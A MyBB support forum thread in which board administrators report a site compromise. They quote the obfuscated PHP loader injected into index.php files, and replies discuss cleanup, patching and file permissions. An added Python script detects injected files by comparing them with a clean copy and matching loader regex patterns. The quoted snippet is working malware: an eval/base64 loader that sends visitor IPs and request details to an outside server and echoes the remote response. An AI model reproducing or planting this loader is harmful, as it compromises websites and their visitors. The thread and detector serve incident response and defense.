MyBB Community Forums

Full Version: how to fix ?
Today I got bulk error emails from my board
saying Your copy of ******  (http://www.*****.com) has experienced an error. Details of the error include:
---
Type: 2
File: archive/index.php (Line no. 506)
Message
file_get_contents(http://91.196.216.30/bt.php?ip=173.245.49.72&amp;host=www.seminarprojects.com&amp;uri=%2Farchive%2Findex.php%2Fforum-22.html&amp;ua=mozilla%2F5.0+%28windows%3B+u%3B+windows+nt+6.1%3B+en-us%3B+rv%3A1.9.1.5%29+gecko%2F20091102+firefox%2F3.5.5&amp;ref=http%3A%2F%2Fwww.seminarprojects.com%2Farchive%2Findex.php) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: HTTP request failed! HTTP/1.1 502 Bad Gateway

And in the same file I found a suspicious script:

<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>

I found there are a lot of errors like this in Google:
http://www.google.co.in/search?gcx=c&sou...196.216.30



I reset the cPanel and MySQL passwords since I feel it's like script injection?



Can anyone say more about this?
I think someone has injected a malicious script into a PHP file,
and there is a similar page at http://community.mybb.com/thread-105586.html
Got the same error mails - I also found modified files (all index.php, config.php, etc.) with injected code :-(
Re-upload fresh MyBB core files.
I have had this same problem today with error messages being mailed to me every time the front page (index.php) is accessed. Looking at this file, I see that it was modified at 0751 this morning and I know I didn't do it. So looking at the file "index.php" using a text editor, I see that a line of code has been added at the very end of the file. I've commented it out, resaved it and, hopefully, the problem is solved. The question remains, how can anybody get to this file and add to it the way that they have. Is it easy to find because my folder name that the site is run on is in the folder /myBB/ ? Even so, how do they edit it? I run the web server myself on my own network and it's also behind a port...............

Also just seen this related post which patches the file index.php - I followed the manual instructions, so hopefully, this problem will not reappear.......

http://blog.mybb.com/wp-content/uploads/...atches.txt
(2011-10-12, 05:15 PM)RogerD Wrote: I have had this same problem today with error messages being mailed to me every time the front page (index.php) is accessed. Looking at this file, I see that it was modified at 0751 this morning and I know I didn't do it. So looking at the file "index.php" using a text editor, I see that a line of code has been added at the very end of the file. I've commented it out, resaved it and, hopefully, the problem is solved. The question remains, how can anybody get to this file and add to it the way that they have. Is it easy to find because my folder name that the site is run on is in the folder /myBB/ ? Even so, how do they edit it? I run the web server myself on my own network and it's also behind a port...............

Also just seen this related post which patches the file index.php - I followed the manual instructions, so hopefully, this problem will not reappear.......

http://blog.mybb.com/wp-content/uploads/...atches.txt

Broken link?
Something similar happened to me yesterday.
I re-uploaded fresh MyBB already.

Can anyone say how they inject a script into a PHP file?

Is it possible for me to block this breach at all?
What would happen if I change the file permission to 444?

Meaning file write permission is denied.
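
Added example, not part of the original thread and not MyBB project code: one way to find every file touched by the injection described above is to compare the live board against a freshly unpacked copy of the same MyBB version and flag files carrying the loader pattern from the first post. The names `audit` and `demo`, the directory layout and the sample files are assumptions; the sample trees are constructed and the payload is a placeholder.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Markers taken from the injected line quoted in the first post.
LOADER_MARKERS = [
    re.compile(rb"eval\s*\(\s*base64_decode\s*\("),
    re.compile(rb"\$_F\s*=\s*__FILE__\s*;\s*\$_X\s*="),
]

def sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def audit(live_root, clean_root):
    """Compare each .php file under live_root with the same path in clean_root.

    Returns {relative_path: "injected" | "modified" | "unknown"}; files that
    are byte-identical to the clean copy are not listed.
    """
    live_root, clean_root = Path(live_root), Path(clean_root)
    findings = {}
    for live in sorted(live_root.rglob("*.php")):
        rel = live.relative_to(live_root)
        clean = clean_root / rel
        if clean.is_file() and sha256(clean) == sha256(live):
            continue
        data = live.read_bytes()
        if any(m.search(data) for m in LOADER_MARKERS):
            status = "injected"   # differs or unknown, and carries the loader
        else:
            status = "modified" if clean.is_file() else "unknown"
        findings[rel.as_posix()] = status
    return findings

def demo():
    """Build constructed live and clean trees in a temp dir, then audit them."""
    with tempfile.TemporaryDirectory() as tmp:
        live, clean = Path(tmp, "live"), Path(tmp, "clean")
        for root in (live, clean):
            (root / "archive").mkdir(parents=True)
            (root / "index.php").write_bytes(b"<?php echo 'home'; ?>\n")
            (root / "archive" / "index.php").write_bytes(b"<?php echo 'a'; ?>\n")
        # Constructed stand-in for the appended line; payload is a placeholder.
        with open(live / "archive" / "index.php", "ab") as fh:
            fh.write(b"<?php $_F=__FILE__;$_X='X';eval(base64_decode('X')); ?>")
        (live / "inc").mkdir()  # site-specific file absent from the clean copy
        (live / "inc" / "config.php").write_bytes(b"<?php $config = array(); ?>\n")
        return audit(live, clean)

if __name__ == "__main__":
    print(demo())
```

Files reported as "unknown" (such as a site-specific config file) have no clean counterpart and need to be read by hand; "modified" files without a marker may be legitimate edits or a different injection.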